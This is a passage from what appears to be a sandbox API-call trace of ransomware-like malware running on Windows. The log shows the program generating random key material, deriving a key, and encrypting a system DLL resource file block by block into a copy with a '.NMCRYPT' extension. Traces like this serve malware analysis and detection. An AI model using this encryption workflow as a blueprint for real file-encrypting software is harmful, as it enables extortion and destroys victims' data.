hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.884] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.885] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.886] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.887] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.887] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.887] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.887] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.888] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0169.888] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.888] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad1f8) returned 1 [0169.888] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0169.888] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0169.888] wcslen (_String="\\\\?\\") returned 0x4 [0169.888] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad238) returned 1 [0169.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.890] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=48640) returned 1 [0169.891] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0169.892] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.923] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.923] GetLastError () returned 0x0 [0169.923] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.924] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.924] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.924] GetLastError () returned 0x0 [0169.924] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.924] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.924] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.925] GetLastError () returned 0x0 [0169.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.925] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.925] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.925] GetLastError () returned 0x0 [0169.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.925] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.925] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.925] GetLastError () returned 0x0 [0169.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.925] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.925] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.925] GetLastError () returned 0x0 [0169.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.925] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.925] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.925] GetLastError () returned 0x0 [0169.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, 